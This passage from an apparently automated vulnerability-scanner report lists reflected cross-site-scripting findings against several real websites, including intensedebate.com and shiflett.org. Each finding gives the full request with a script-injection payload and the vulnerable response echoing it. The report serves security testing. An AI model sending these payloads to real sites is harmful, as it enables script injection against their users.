Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIR; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:11 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/1256236826/Top1c515b"><script>alert(1)</script>063cb3f5ca9/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.67. http://pcgro.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pcgro.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beba3'%3balert(1)//a5854d94aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as beba3';alert(1)//a5854d94aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?beba3'%3balert(1)//a5854d94aff=1 HTTP/1.1
Host: pcgro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:53:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 1 Jan 2001 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: 9e9d38e7ad620998fb8da7bce594c371=4b20ac2b0f499164fa2e1b141b01c72e; path=/
Set-Cookie: lang=deleted; expires=Sun, 31-Jan-2010 20:53:12 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Sun, 31-Jan-2010 20:53:12 GMT; path=/
Set-Cookie: jfcookie[lang]=en; expires=Tue, 01-Feb-2011 20:53:13 GMT; path=/
Last-Modified: Mon, 31 Jan 2011 20:53:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 79756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
ge,.roknewspager-div a,#rokintroscroller,.feature-block .image-full']}); });window.addEvent('domready', function() { new GantryMoreArticles({'leadings': 1, 'moreText': 'Load More Articles', 'url': '/?beba3';alert(1)//a5854d94aff=1&amp;tmpl=component&amp;type=raw'}); })
        window.addEvent('load', function() {
                   new Fusion('ul.menutop', {
                       pill: 0,
                       effect: 'slide',
                       opacity: 1,
                       hideDelay: 500,
   
...[SNIP]...

1.68. http://s.intensedebate.com/css/base.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ecad'><script>alert(1)</script>cf169dd7d02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/base.css8ecad'><script>alert(1)</script>cf169dd7d02 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:46 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4793

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/base.css8ecad'><script>alert(1)</script>cf169dd7d02'>
...[SNIP]...

1.69. http://s.intensedebate.com/css/ie6.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86fcd'><script>alert(1)</script>3b532c73185 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/ie6.css86fcd'><script>alert(1)</script>3b532c73185 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:45 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4792

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/ie6.css86fcd'><script>alert(1)</script>3b532c73185'>
...[SNIP]...

1.70. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/sys.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cb57'><script>alert(1)</script>0de770915df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sys.css4cb57'><script>alert(1)</script>0de770915df HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:41 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4793

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/sys.css4cb57'><script>alert(1)</script>0de770915df'>
...[SNIP]...

1.71. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/avatar-compact.png/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13f4b'><script>alert(1)</script>0aa548d0782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images13f4b'><script>alert(1)</script>0aa548d0782/avatar-compact.png/ HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 17:33:32 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4812

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images13f4b'><script>alert(1)</script>0aa548d0782/avatar-compact.png/'>
...[SNIP]...

1.72. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/avatar-compact.png/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2dc7a'><script>alert(1)</script>2027a17b009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/avatar-compact.png2dc7a'><script>alert(1)</script>2027a17b009/ HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 17:33:33 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4811

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/avatar-compact.png2dc7a'><script>alert(1)</script>2027a17b009/'>
...[SNIP]...

1.73. http://s.intensedebate.com/images/avatar-compact.png/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/avatar-compact.png/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eef9c'><script>alert(1)</script>96c8bfb1934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/avatar-compact.png/?eef9c'><script>alert(1)</script>96c8bfb1934=1 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 17:33:31 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4815

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/avatar-compact.png/?eef9c'><script>alert(1)</script>96c8bfb1934=1'>
...[SNIP]...

1.74. http://s.intensedebate.com/images/twitter-favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/twitter-favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 318e9'><script>alert(1)</script>74331322a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/twitter-favicon.ico318e9'><script>alert(1)</script>74331322a03 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:48:24 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4720

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/twitter-favicon.ico318e9'><script>alert(1)</script>74331322a03'>
...[SNIP]...

1.75. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /js/idm-combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb51c'><script>alert(1)</script>74206c45e41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/idm-combined.jseb51c'><script>alert(1)</script>74206c45e41 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:54 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4797

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/idm-combined.jseb51c'><script>alert(1)</script>74206c45e41'>
...[SNIP]...

1.76. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a414<script>alert(1)</script>cf5cd8e3bbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles4a414<script>alert(1)</script>cf5cd8e3bbc/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:12 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=df60ff40e08eff0677e1afb71feea2d3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5024
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "articles4a414<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /articles4a414<script>alert(1)</script>cf5cd8e3bbc/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d
...[SNIP]...

1.77. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20e7<script>alert(1)</script>542bd57d083 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articlesa20e7<script>alert(1)</script>542bd57d083/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:13 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=770c495619ef96fd0a5bb62f44001a4c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5024
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "articlesa20e7<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /articlesa20e7<script>alert(1)</script>542bd57d083/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d
...[SNIP]...

1.78. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44b7b<script>alert(1)</script>9955f5d98cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images44b7b<script>alert(1)</script>9955f5d98cd/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:43:59 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=c92e2ca30a9726b7dd7291a656f9b197; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5284
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "images44b7b<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /images44b7b<script>alert(1)</script>9955f5d98cd/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26s
...[SNIP]...

1.79. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e40d<script>alert(1)</script>cfd456afc3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/foiling_cross_site_attacks_2.png3e40d<script>alert(1)</script>cfd456afc3e/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:43:59 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=cbdc6372d279cc054078897e548799a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5240
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "images" controller does not exist
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /w
...[SNIP]...
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /images/foiling_cross_site_attacks_2.png3e40d<script>alert(1)</script>cfd456afc3e/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x
...[SNIP]...

